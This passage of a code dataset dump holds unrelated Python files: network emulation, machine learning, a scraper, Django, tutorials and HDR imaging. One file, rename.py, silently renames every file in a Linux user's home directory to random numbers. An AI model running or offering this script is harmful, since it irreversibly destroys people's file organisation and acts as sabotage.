validate(request.json, switch_schema)\n switch = _create_switch(experiment, request.json)\n response.content_type = 'application/json'\n response.status = 201\n response.set_header('Location', \"http://experiment/{}/switch/{}\".format(experiment, switch.name))\n return json.dumps({'name': switch.name, 'type': 'SWITCH'})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_switch(experiment, switch):\n exp = experiments[experiment]\n switch_id = len(exp.switches) + 1\n\n logger.debug(\"creating switch for experiment={}, switch={}, workerId={}, dpid={}\"\n .format(experiment, switch['name'], switch['workerId'], switch_id))\n sw = exp.addSwitch(switch['name'], dpid=Tools.makeDPID(switch_id), wid=switch['workerId'])\n return sw\n\n@post('/experiment//link')\ndef create_link(experiment):\n try:\n validate(request.json, link_schema)\n link = _create_link(experiment, request.json['node1'], request.json['node2'])\n response.content_type = 'application/json'\n response.status = 201\n\n # TODO - how to get info from the returned \"link\" object?\n response.set_header('Location', \"http://experiment/{}/link/{}/{}\".format(experiment, request.json['node1']['name'], request.json['node2']['name']))\n return json.dumps({'node1': {'name': request.json['node1']['name'], 'type': request.json['node1']['type']}, 'node2': {'name': request.json['node2']['name'], 'type': request.json['node2']['type']}})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_link(experiment, node1, node2):\n exp = experiments[experiment]\n\n logger.debug(\"creating link for experiment={}, node1={}, node1type={}, node2={}, node2type={}\"\n .format(experiment, node1['name'], node1['type'], node2['name'], node2['type']))\n link = exp.addLink(node1['name'], node2['name'], autoconf=True)\n return link\n\ndef start_server(interface, port):\n run(host='0.0.0.0', port=port, debug=True)\n\n\ndef main():\n global logger\n global clusters\n global experiments\n clusters = {}\n experiments = {}\n\n logging.basicConfig(format='%(levelname)s:%(message)s',\n level=logging.DEBUG)\n logger = logging.getLogger()\n #mininet_cleanup()\n start_server('0.0.0.0', 38081)\n\nif __name__ == '__main__':\n main()\n","sub_path":"services/maxinet/app/maxinet_rest.py","file_name":"maxinet_rest.py","file_ext":"py","file_size_in_byte":10471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"186717939","text":"\nlista=[]\nvinicial=int(input('ingrese un valor inicial: '))\nvfinal=int(input('ingrese un valor final: '))\nvintervalo=int(input('ingrese el intervalo entre cada numero: '))\ncontador=0\nfor i in range(vinicial,vfinal+1,vintervalo):\n lista.append(i)\n contador=contador+i\nprint(lista)\nprint('la suma de los valores listados es: ', contador)\n","sub_path":"py6_retos2/reto09.py","file_name":"reto09.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"636288263","text":"'''\nCreated on 22 Aug 2016\n\n@author: mozat\n'''\nimport multiprocessing\nimport time\nfrom visenze_multiprocessor_api import VisenzeMultiProcessor\nfrom visenze_logger import VisenzeLogger\nfrom client import ViSearchAPI\nfrom db.simple_dbs import MySQL\nfrom config import *\nfrom collections import defaultdict\nimport json\n\n\ndef analysis_log():\n import re\n log_file = './log/2017-08-19 11:23:08.log'\n processed = set()\n p = re.compile('INFO (\\d+)')\n with open(log_file, 'r') as fp:\n for line in fp.readlines():\n r = p.search(line)\n if r.groups():\n processed.add(r.groups()[0])\n return processed\n\n\ndef get_garments(num_process):\n garment_conn = MySQL(DEJA_ALGORITHM)\n sql = '''\n select garment_id, g_crop_url, g_tags_id, g_img_attribute, g_source_id from algorithm.deja_street_garment2;\n '''\n new_garments = garment_conn.fetch_rows(sql)\n garment_source_id = defaultdict(list)\n for idx, record in enumerate(new_garments):\n # if record['garment_id'] in processed:\n # continue\n visense_record = {'im_name': record['garment_id'],\n 'im_url': record['g_crop_url'],\n 'category': int(json.loads(record['g_tags_id'])['0'][0]),\n 'white': 1 if record['g_img_attribute'] == 'white' else 0,\n 'pid': record['g_source_id'].split('_')[0]\n }\n garment_source_id[idx % num_process].append(visense_record)\n return garment_source_id\n\n\nif __name__ == '__main__':\n processed = analysis_log()\n\n num_process = 20\n garment_source_id = get_garments(num_process)\n semaphores = multiprocessing.Semaphore(3)\n processes = []\n for key, value in garment_source_id.iteritems():\n p = VisenzeMultiProcessor(mode='insert', upload_task=value,\n semaphores=semaphores,\n check_existence=True)\n processes.append(p)\n p.start()\n for p in processes:\n p.join()\n pass\n","sub_path":"visearch_upload_photos/visenze_inserter.py","file_name":"visenze_inserter.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"550771721","text":"import torch.nn as nn\nimport torchvision.models as models\n\nfrom ..blocks import (\n RefineNetBlock,\n ResidualConvUnit,\n RefineNetBlockImprovedPooling\n)\n\n\nclass BaseRefineNet4Cascade(nn.Module):\n\n def __init__(self, input_shape,\n RefineNetBlock,\n num_classes=1,\n features=256,\n resnet_factory=models.resnet101,\n pretrained=True,\n freeze_resnet=True):\n \"\"\"Multi-path 4-Cascaded RefineNet for image segmentation\n\n Args:\n input_shape ((int, int)): (channel, size) assumes input has\n equal height and width\n refinenet_block (block): RefineNet Block\n num_classes (int, optional): number of classes\n features (int, optional): number of features in refinenet\n resnet_factory (func, optional): A Resnet model from torchvision.\n Default: models.resnet101\n pretrained (bool, optional): Use pretrained version of resnet\n Default: True\n freeze_resnet (bool, optional): Freeze resnet model\n Default: True\n\n Raises:\n ValueError: size of input_shape not divisible by 32\n \"\"\"\n super().__init__()\n\n input_channel, input_size = input_shape\n\n if input_size % 32 != 0:\n raise ValueError(f\"{input_shape} not divisble by 32\")\n\n resnet = resnet_factory(pretrained=pretrained)\n\n self.layer1 = nn.Sequential(\n resnet.conv1,\n resnet.bn1,\n resnet.relu,\n resnet.maxpool,\n resnet.layer1\n )\n\n self.layer2 = resnet.layer2\n self.layer3 = resnet.layer3\n self.layer4 = resnet.layer4\n\n if freeze_resnet:\n layers = [self.layer1, self.layer2, self.layer3, self.layer4]\n for layer in layers:\n for param in layer.parameters():\n param.requires_grad = False\n\n self.layer1_rn = nn.Conv2d(\n 256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.layer2_rn = nn.Conv2d(\n 512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.layer3_rn = nn.Conv2d(\n 1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.layer4_rn = nn.Conv2d(\n 2048, 2 * features, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.refinenet4 = RefineNetBlock(\n 2 * features, (2 * features, input_size // 32))\n self.refinenet3 = RefineNetBlock(\n features, (2 * features, input_size // 32), (features, input_size // 16))\n self.refinenet2 = RefineNetBlock(\n features, (features, input_size // 16), (features, input_size // 8))\n self.refinenet1 = RefineNetBlock(\n features, (features, input_size // 8), (features, input_size // 4))\n\n self.output_conv = nn.Sequential(\n ResidualConvUnit(features),\n ResidualConvUnit(features),\n nn.Conv2d(features, num_classes, kernel_size=1, stride=1, padding=0, bias=True)\n )\n\n def forward(self, x):\n\n layer_1 = self.layer1(x)\n layer_2 = self.layer2(layer_1)\n layer_3 = self.layer3(layer_2)\n layer_4 = self.layer4(layer_3)\n\n layer_1_rn = self.layer1_rn(layer_1)\n layer_2_rn = self.layer2_rn(layer_2)\n layer_3_rn = self.layer3_rn(layer_3)\n layer_4_rn = self.layer4_rn(layer_4)\n\n path_4 = self.refinenet4(layer_4_rn)\n path_3 = self.refinenet3(path_4, layer_3_rn)\n path_2 = self.refinenet2(path_3, layer_2_rn)\n path_1 = self.refinenet1(path_2, layer_1_rn)\n out = self.output_conv(path_1)\n return out\n\n def named_parameters(self):\n \"\"\"Returns parameters that requires a gradident to update.\"\"\"\n return (p for p in super().named_parameters() if p[1].requires_grad)\n\n\nclass RefineNet4CascadePoolingImproved(BaseRefineNet4Cascade):\n\n def __init__(self, input_shape,\n num_classes=1,\n features=256,\n resnet_factory=models.resnet101,\n pretrained=True,\n freeze_resnet=True):\n \"\"\"Multi-path 4-Cascaded RefineNet for image segmentation with improved pooling\n\n Args:\n input_shape ((int, int)): (channel, size) assumes input has\n equal height and width\n refinenet_block (block): RefineNet Block\n num_classes (int, optional): number of classes\n features (int, optional): number of features in refinenet\n resnet_factory (func, optional): A Resnet model from torchvision.\n Default: models.resnet101\n pretrained (bool, optional): Use pretrained version of resnet\n Default: True\n freeze_resnet (bool, optional): Freeze resnet model\n Default: True\n\n Raises:\n ValueError: size of input_shape not divisible by 32\n \"\"\"\n super().__init__(input_shape, RefineNetBlockImprovedPooling,\n num_classes=num_classes, features=features,\n resnet_factory=resnet_factory, pretrained=pretrained,\n freeze_resnet=freeze_resnet)\n\n\nclass RefineNet4Cascade(BaseRefineNet4Cascade):\n\n def __init__(self, input_shape,\n num_classes=1,\n features=256,\n resnet_factory=models.resnet101,\n pretrained=True,\n freeze_resnet=False):\n \"\"\"Multi-path 4-Cascaded RefineNet for image segmentation\n\n Args:\n input_shape ((int, int)): (channel, size) assumes input has\n equal height and width\n refinenet_block (block): RefineNet Block\n num_classes (int, optional): number of classes\n features (int, optional): number of features in refinenet\n resnet_factory (func, optional): A Resnet model from torchvision.\n Default: models.resnet101\n pretrained (bool, optional): Use pretrained version of resnet\n Default: True\n freeze_resnet (bool, optional): Freeze resnet model\n Default: True\n\n Raises:\n ValueError: size of input_shape not divisible by 32\n \"\"\"\n super().__init__(input_shape, RefineNetBlock,\n num_classes=num_classes, features=features,\n resnet_factory=resnet_factory, pretrained=pretrained,\n freeze_resnet=freeze_resnet)\n","sub_path":"KAGGLE_TGS_PYTORCH/pytorch_refinenet/pytorch_refinenet/refinenet/refinenet_4cascade.py","file_name":"refinenet_4cascade.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"381362572","text":"'''\n\tThis file allows users to visualize sets of genes with tsne\n'''\n\nimport numpy as np\nimport os\nimport subprocess\nimport json\nimport shutil\nimport itertools\nimport sys, argparse\nimport time\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom halo import Halo\nsys.path.append(os.path.dirname(os.getcwd()))\n\nfrom GTEx import GTEx\nfrom subset_gene_test import create_raw_combos, create_random_subset, load_data, convert_sets_to_vecs\n\nif __name__ == '__main__':\n\n\t# parse arguments\n\tparser = argparse.ArgumentParser(description='Run tests on specified subsets of a hallmark or random set')\n\tparser.add_argument('--set', help='subset to be used', type=str, required=True, choices=['hedgehog', 'notch', 'random'])\n\tparser.add_argument('--num_genes', help='number of genes', type=int, required=True)\n\tparser.add_argument('--set_size', help='size of subsets to visualize', type=int, required=True, choices=[1,2,3])\n\tparser.add_argument('--save', help='save .npy TSNE matrix', action='store_true')\n\tparser.add_argument('--load', help='load .npy TSNE matrix', action='store_true')\n\tparser.add_argument('--pca', help='run PCA on data before TSNE', action='store_true')\n\targs = parser.parse_args()\n\n\t# start halo spinner\n\tspinner = Halo(text='Loading', spinner='dots')\n\n\t# load the GTEx float data and the list of total genes in GTEx\n\tprint('loading genetic data...')\n\tspinner.start()\n\tgtex_gct_flt = np.load('../datasets/gtex_gct_data_float.npy')\n\ttotal_gene_list = np.load('../datasets/gtex_complete_gene_list_str.npy')\n\tspinner.stop()\n\n\t# load a data dictionary with keys as classes, values as partioned GEMs\n\tdata = load_data(\"../data_scripts/numsamples.json\", gtex_gct_flt)\n\n\t# load gene subset based on paramaters given\n\tif args.set == 'hedgehog':\n\t\tsub = np.load('../datasets/hallmark_numpys/HALLMARK_HEDGEHOG_SIGNALING.npy')\n\t\tgenes = sub[:,1].tolist()\n\telif args.set == 'notch':\n\t\tsub = np.load('../datasets/hallmark_numpys/HALLMARK_NOTCH_SIGNALING.npy')\n\t\tgenes = sub[:,1].tolist()\n\telse:\n\t\tgenes = create_random_subset(args.num_genes, total_gene_list)\n\n\n\t# create dictionary of combinations of genes\n\tgene_dict = create_raw_combos(genes, args.set_size)\n\n\t######## THIS IS HARDCODED FOR NOW... MUST CHANGE IN FUTURE ################\n\tprev_accs = np.loadtxt('../logs/hedgehog/hh_3_gene_accuracy.txt', delimiter='\\t', dtype=np.str)\n\taccs = prev_accs[:,1]\n\taccs = accs.astype(np.float32)\n\n\t# convert dictionary to list\n\tcombo_list = []\n\tfor k in gene_dict:\n\t\tcombo_list.append(list(k))\n\n\n\tif args.load:\n\t\tprint('\\nLoading .npy TSNE file...')\n\t\tX_embedded = np.load('../datasets/TSNE/' + str(args.set) + '_' + str(args.set_size) + '.npy')\n\telse:\n\t\tprint('creating TSNE calculation matrix...')\n\t\tspinner.start()\n\n\t\tx_data = convert_sets_to_vecs(data, total_gene_list, combo_list, args.set_size)\n\n\t\tspinner.stop()\n\n\t\t#run PCA\n\t\tif args.pca:\n\t\t\tprint('running PCA...')\n\t\t\tspinner.start()\n\n\t\t\tpca = PCA()\n\t\t\tpca.fit(x_data)\n\t\t\tx_data = pca.transform(x_data)\n\n\t\t\tspinner.stop()\n\n\t\t# run TSNE\n\t\tspinner.start()\n\n\t\tprint('running TSNE...')\n\t\tX_embedded = TSNE().fit_transform(x_data)\n\n\t\tspinner.stop()\n\n\n\tif args.save:\n\t\tprint('Saving .npy TSNE file...')\n\t\tif args.pca:\n\t\t\tnp.save('../datasets/TSNE/pca_' + str(args.set) + '_' + str(args.set_size) + '.npy', X_embedded)\n\t\telse:\n\t\t\tnp.save('../datasets/TSNE/' + str(args.set) + '_' + str(args.set_size) + '_30_70.npy', X_embedded)\n\n\n\t# viz with seaborne\n\t#sns.regplot(x=X_embedded[:,0], y=X_embedded[:,1], fit_reg=False, scatter_kws={'s':1})\n\n\t# UNCOMMENT FOR HUE VISUALIZATION OF CLASSIFICATIONS\n\tplt.scatter(X_embedded[:,0], X_embedded[:,1], c=accs, s=0.5, cmap=plt.cm.coolwarm)\n\tcbar = plt.colorbar()\n\n\t# apply labels to points with > 50% accuracy\n\n\tfor label, x, y in zip(accs, X_embedded[:, 0], X_embedded[:, 1]):\n\t\tif float(label) > 0.52:\n\t\t plt.annotate(\n\t\t label,\n\t\t xy=(x, y), xytext=(-10, 10), size=6,\n\t\t textcoords='offset points', ha='right', va='bottom',\n\t\t bbox=dict(boxstyle='round,pad=0.1', fc='yellow', alpha=0.5),\n\t\t arrowprops=dict(arrowstyle = '->', connectionstyle='arc3,rad=0'))\n\n\t# show plot\n\tplt.show()\n","sub_path":"scripts/viz/tsne_viz.py","file_name":"tsne_viz.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"154646706","text":"# Scrapy settings for health project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'health'\n\nSPIDER_MODULES = ['health.spiders']\nNEWSPIDER_MODULE = 'health.spiders'\n\nITEM_PIPELINES = [\n # 'health.pipeline.PricePipeline',\n # 'health.pipeline.HealthPipeline':100\n 'health.pipelines.HealthPipeline',\n # 'health.pipelines.HealthPipeline',\n #'health.pipelines.MySQLStorePipeline'\n]\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'health (+http://www.yourdomain.com)'\n","sub_path":"health/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"76727467","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nfrom cms.sitemaps import CMSSitemap\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom bookstore import views as bookstore_views\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap',\n {'sitemaps': {'cmspages': CMSSitemap}}),\n url(r'^select2/', include('django_select2.urls')),\n]\n\nurlpatterns += i18n_patterns('',\n url(r'^bookstore/', bookstore_views.index, name='bookstore'),\n url(r'^newbook$', bookstore_views.book_add, name='book_add'),\n url(r'^editbook/(?P\\d+)$', bookstore_views.book_edit, name='book_edit'),\n url(r'^deletebook/(?P\\d+)$', bookstore_views.book_delete, name='book_delete'),\n url(r'^book/(?P\\d+)/', bookstore_views.book_detail, name='book_detail'),\n url(r'^admin/', include(admin.site.urls)), # NOQA\n url(r'^', include('cms.urls')),\n)\n\n# This is only needed when using runserver.\nif settings.DEBUG:\n urlpatterns = [\n url(r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n ] + staticfiles_urlpatterns() + urlpatterns\n","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"494513134","text":"#Programa em python que renomeia arquivos(sem privilégio root) de um usuário linux\n\nimport os\nimport random\n\nlistdir = os.listdir(\"/home\")\nif (len(listdir) == 1):\n path = \"/home/\" + listdir[0]\nelse:\n path = \"/tmp\"\n\n\n\nfor filename in os.listdir(path):\n os.rename(path + \"/\" + filename, path + \"/\" + str(random.randint(111, 111111)))\n\n\n","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"42974052","text":"########################Writing your own Function###########################\r\n\r\n#####Function without a parameter#####\r\n# Define the function shout\r\ndef shout():\r\n \"\"\"Print a string with three exclamation marks\"\"\"\r\n # Concatenate the strings: shout_word\r\n shout_word = 'congratulations' + '!!!'\r\n\r\n # Print shout_word\r\n print(shout_word)\r\n\r\n# Call shout\r\nshout()\r\n\r\n\r\n#####Function with 1 parameter#####\r\n# Define shout with the parameter, word\r\ndef shout(word):\r\n \"\"\"Return a string with three exclamation marks\"\"\"\r\n # Concatenate the strings: shout_word\r\n shout_word = word + '!!!'\r\n\r\n # Replace print with return\r\n return(shout_word)\r\n\r\n# Pass 'congratulations' to shout: yell\r\nyell = shout('congratulations')\r\n\r\n# Print yell\r\nprint(yell)\r\n\r\n\r\n#####Function with multiple parameters#####\r\n# Define shout with parameters word1 and word2\r\ndef shout(word1, word2):\r\n \"\"\"Concatenate strings with three exclamation marks\"\"\"\r\n # Concatenate word1 with '!!!': shout1\r\n shout1 = word1 + '!!!'\r\n \r\n # Concatenate word2 with '!!!': shout2\r\n shout2 = word2 + '!!!'\r\n \r\n # Concatenate shout1 with shout2: new_shout\r\n new_shout = shout1 + shout2\r\n\r\n # Return new_shout\r\n return new_shout\r\n\r\n# Pass 'congratulations' and 'you' to shout(): yell\r\nyell = shout('congratulations', 'you')\r\n\r\n# Print yell\r\nprint(yell)\r\n\r\n\r\n#####Nested Functions#####\r\n# Define echo\r\ndef echo(n):\r\n \"\"\"Return the inner_echo function.\"\"\"\r\n\r\n # Define inner_echo\r\n def inner_echo(word1):\r\n \"\"\"Concatenate n copies of word1.\"\"\"\r\n echo_word = word1 * n\r\n return echo_word\r\n\r\n # Return inner_echo\r\n return inner_echo\r\n\r\n# Call echo: twice\r\ntwice = echo(2)\r\n\r\n# Call echo: thrice\r\nthrice = echo(3)\r\n\r\n# Call twice() and thrice() then print\r\nprint(twice('hello'), thrice('hello'))\r\n\r\n\r\n#####Functions with 1 default arguement#####\r\n# Define shout_echo\r\ndef shout_echo(word1, echo=1):\r\n \"\"\"Concatenate echo copies of word1 and three\r\n exclamation marks at the end of the string.\"\"\"\r\n\r\n # Concatenate echo copies of word1 using *: echo_word\r\n echo_word = word1*echo\r\n\r\n # Concatenate '!!!' to echo_word: shout_word\r\n shout_word = echo_word + '!!!'\r\n\r\n # Return shout_word\r\n return shout_word\r\n\r\n# Call shout_echo() with \"Hey\": no_echo\r\nno_echo = shout_echo(\"Hey\")\r\n\r\n# Call shout_echo() with \"Hey\" and echo=5: with_echo\r\nwith_echo = shout_echo(\"Hey\", echo=5)\r\n\r\n# Print no_echo and with_echo\r\nprint(no_echo)\r\nprint(with_echo)\r\n\r\n\r\n#####Functions with multiple default arguments#####\r\n# Define shout_echo\r\ndef shout_echo(word1, echo=1, intense=False):\r\n \"\"\"Concatenate echo copies of word1 and three\r\n exclamation marks at the end of the string.\"\"\"\r\n\r\n # Concatenate echo copies of word1 using *: echo_word\r\n echo_word = word1 * echo\r\n\r\n # Capitalize echo_word if intense is True\r\n if intense is True:\r\n # Capitalize and concatenate '!!!': echo_word_new\r\n echo_word_new = echo_word.upper() + '!!!'\r\n else:\r\n # Concatenate '!!!' to echo_word: echo_word_new\r\n echo_word_new = echo_word + '!!!'\r\n\r\n # Return echo_word\r\n return echo_word_new\r\n\r\n# Call shout_echo() with \"Hey\", echo=5 and intense=True: with_big_echo\r\nwith_big_echo = shout_echo(\"Hey\", echo=5, intense=True)\r\n\r\n# Call shout_echo() with \"Hey\" and intense=True: big_no_echo\r\nbig_no_echo = shout_echo(\"Hey\", intense=True)\r\n\r\n# Print values\r\nprint(with_big_echo)\r\nprint(big_no_echo)\r\n\r\n\r\n#####Functions with *args#####\r\n#flexible arguments enable you to pass a variable number of arguments to a function\r\n# Define gibberish\r\ndef gibberish(*args):\r\n \"\"\"Concatenate strings in *args together.\"\"\"\r\n\r\n # Initialize an empty string: hodgepodge\r\n hodgepodge = \"\"\r\n\r\n # Concatenate the strings in args\r\n for word in args:\r\n hodgepodge += word\r\n\r\n # Return hodgepodge\r\n return hodgepodge\r\n\r\n# Call gibberish() with one string: one_word\r\none_word = gibberish(\"luke\")\r\n\r\n# Call gibberish() with five strings: many_words\r\nmany_words = gibberish(\"luke\", \"leia\", \"han\", \"obi\", \"darth\")\r\n\r\n# Print one_word and many_words\r\nprint(one_word)\r\nprint(many_words)\r\n\r\n\r\n","sub_path":"Python Data Science Toolbox 1_Functions.py","file_name":"Python Data Science Toolbox 1_Functions.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"629511837","text":"from joblib import Parallel, delayed\nimport multiprocessing as mp\nimport numpy as np\nimport random\nimport cv2\nimport os\nfrom tkinter import *\nimport time\nimport matplotlib\nfrom skimage.restoration import (denoise_tv_chambolle, denoise_bilateral, denoise_wavelet, estimate_sigma)\nfrom skimage import data, img_as_float\nfrom skimage.util import random_noise\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom itertools import islice\n\ndef chunkIt(seq, num):\n avg = len(seq) / float(num)\n out = []\n last = 0.0\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n return out\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\n # Print New Line on Complete\n if iteration == total: \n print()\n\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\n\n\ndef linearWeight(pixel_value):\n \"\"\" Linear weighting function based on pixel intensity that reduces the\n weight of pixel values that are near saturation.\n\n Parameters\n ----------\n pixel_value : np.uint8\n A pixel intensity value from 0 to 255\n\n Returns\n -------\n weight : np.float64\n The weight corresponding to the input pixel intensity\n\n \"\"\"\n z_min, z_max = 0.,255.\n if pixel_value <= (z_min + z_max) / 2:\n w = pixel_value - z_min\n else:\n w = z_max - pixel_value\n\n return w\n # return pixel_value - z_min\n # return z_max - pixel_value\n\n\ndef sampleIntensities(images):\n \"\"\"Randomly sample pixel intensities from the exposure stack.\n\n Parameters\n ----------\n images : list\n A list containing a stack of single-channel (i.e., grayscale)\n layers of an HDR exposure stack\n\n Returns\n -------\n intensity_values : numpy.array, dtype=np.uint8\n An array containing a uniformly sampled intensity value from each\n exposure layer (shape = num_intensities x num_images)\n\n \"\"\"\n z_min, z_max = 0, 255\n num_intensities = z_max - z_min + 1 #values of g(z)\n num_images = len(images)\n intensity_values = np.zeros((num_intensities, num_images), dtype=np.uint8) #matriz de funcion de respuesta\n\n # Find the middle image to use as the source for pixel intensity locations\n mid_img = images[num_images // 2]\n\n for i in range(z_min, z_max + 1):\n rows, cols = np.where(mid_img == i)\n if len(rows) != 0:\n idx = random.randrange(len(rows))\n for j in range(num_images):\n intensity_values[i, j] = images[j][rows[idx], cols[idx]]\n return intensity_values\n\n\ndef computeResponseCurve(intensity_samples, log_exposures, smoothing_lambda, weighting_function):\n \"\"\"Find the camera response curve for a single color channel\n\n Parameters\n ----------\n intensity_samples : numpy.ndarray #Este es lo calculado en funcion Sample Intensities como intensity_values\n Stack of single channel input values (num_samples x num_images)\n\n log_exposures : numpy.ndarray\n Log exposure times (size == num_images)\n\n smoothing_lambda : float\n A constant value used to correct for scale differences between\n data and smoothing terms in the constraint matrix -- source\n paper suggests a value of 100.\n\n weighting_function : callable\n Function that computes a weight from a pixel intensity\n\n Returns\n -------\n numpy.ndarray, dtype=np.float64\n Return a vector g(z) where the element at index i is the log exposure\n of a pixel with intensity value z = i (e.g., g[0] is the log exposure\n of z=0, g[1] is the log exposure of z=1, etc.)\n \"\"\"\n z_min, z_max = 0, 255\n intensity_range = 255 # difference between min and max possible pixel value for uint8\n num_samples = intensity_samples.shape[0]\n num_images = len(log_exposures)\n\n # NxP + [(Zmax-1) - (Zmin + 1)] + 1 constraints; N + 256 columns\n mat_A = np.zeros((num_images * num_samples + intensity_range, num_samples + intensity_range + 1), dtype=np.float64)\n mat_b = np.zeros((mat_A.shape[0], 1), dtype=np.float64)\n\n # 1. Add data-fitting constraints:\n print('Computing response curve step1')\n k = 0\n for i in range(num_samples):\n for j in range(num_images):\n z_ij = intensity_samples[i, j]\n w_ij = weighting_function(z_ij)\n mat_A[k, z_ij] = w_ij\n mat_A[k, (intensity_range + 1) + i] = -w_ij\n mat_b[k, 0] = w_ij * log_exposures[j]\n k += 1\n print('Computing response curve step2')\n # 2. Add smoothing constraints:\n for z_k in range(z_min + 1, z_max):\n w_k = weighting_function(z_k)\n mat_A[k, z_k - 1] = w_k * smoothing_lambda\n mat_A[k, z_k ] = -2 * w_k * smoothing_lambda\n mat_A[k, z_k + 1] = w_k * smoothing_lambda\n k += 1\n\n # 3. Add color curve centering constraint:\n mat_A[k, (z_max - z_min) // 2] = 1\n print('Solving matrix response curve')\n inv_A = np.linalg.pinv(mat_A)\n x = np.dot(inv_A, mat_b)\n\n g = x[0: intensity_range + 1]\n return g[:, 0]\n\n\ndef computeRadianceMap(images, log_exposure_times, response_curve, weighting_function):\n \"\"\"Calculate a radiance map for each pixel from the response curve.\n\n Parameters\n ----------\n images : list\n Collection containing a single color layer (i.e., grayscale)\n from each image in the exposure stack. (size == num_images)\n\n log_exposure_times : numpy.ndarray\n Array containing the log exposure times for each image in the\n exposure stack (size == num_images)\n\n response_curve : numpy.ndarray\n Least-squares fitted log exposure of each pixel value z\n\n weighting_function : callable\n Function that computes the weights\n\n Returns\n -------\n numpy.ndarray(dtype=np.float64)\n The image radiance map (in log space)\n \"\"\"\n img_shape = images[0].shape\n img_rad_map = np.zeros(img_shape, dtype=np.float64)\n num_images = len(images)\n print('Computing radiance map')\n # printProgressBar(0, img_shape[0], prefix = 'Progress:', suffix = 'Complete', length = 50)\n \n for i in range(img_shape[0]):\n for j in range(img_shape[1]):\n g = np.array([response_curve[images[k][i, j]] for k in range(num_images)])\n w = np.array([weighting_function(images[k][i, j]) for k in range(num_images)])\n SumW = np.sum(w)\n if SumW > 0:\n img_rad_map[i, j] = np.sum(w * (g - log_exposure_times) / SumW)\n else:\n img_rad_map[i, j] = g[num_images // 2] - log_exposure_times[num_images // 2]\n # printProgressBar(i + 1, img_shape[0], prefix = 'Progress:', suffix = 'Complete', length = 50)\n return np.array(img_rad_map,dtype=np.complex)\n\n\ndef r_c_parallel(i,images, log_exposure_times, response_curve, weighting_function):\n \"\"\"Calculate a radiance map for each pixel from the response curve.\n\n Parameters\n ----------\n images : list\n Collection containing a single color layer (i.e., grayscale)\n from each image in the exposure stack. (size == num_images)\n\n log_exposure_times : numpy.ndarray\n Array containing the log exposure times for each image in the\n exposure stack (size == num_images)\n\n response_curve : numpy.ndarray\n Least-squares fitted log exposure of each pixel value z\n\n weighting_function : callable\n Function that computes the weights\n\n Returns\n -------\n numpy.ndarray(dtype=np.float64)\n The image radiance map (in log space)\n \"\"\"\n img_shape = images[0].shape\n img_rad_map = np.zeros(img_shape, dtype=np.float64)\n num_images = len(images)\n print('Making row %i'%i)\n # printProgressBar(0, img_shape[0], prefix = 'Progress:', suffix = 'Complete', length = 50)\n \n # for i in range(img_shape[0]):\n for j in range(img_shape[1]):\n g = np.mean(np.array([response_curve[images[k][i, j]] for k in range(num_images)]),axis=0)\n w = np.mean(np.array([weighting_function(images[k][i, j]) for k in range(num_images)]),axis=0)\n SumW = np.sum(w)\n if SumW > 0:\n img_rad_map[i, j] = np.sum(w * (g - log_exposure_times) / SumW)\n # return img_rad_map\n else:\n img_rad_map[i, j] = g[num_images // 2] - log_exposure_times[num_images // 2]\n # return img_rad_map\n # printProgressBar(i + 1, img_shape[0], prefix = 'Progress:', suffix = 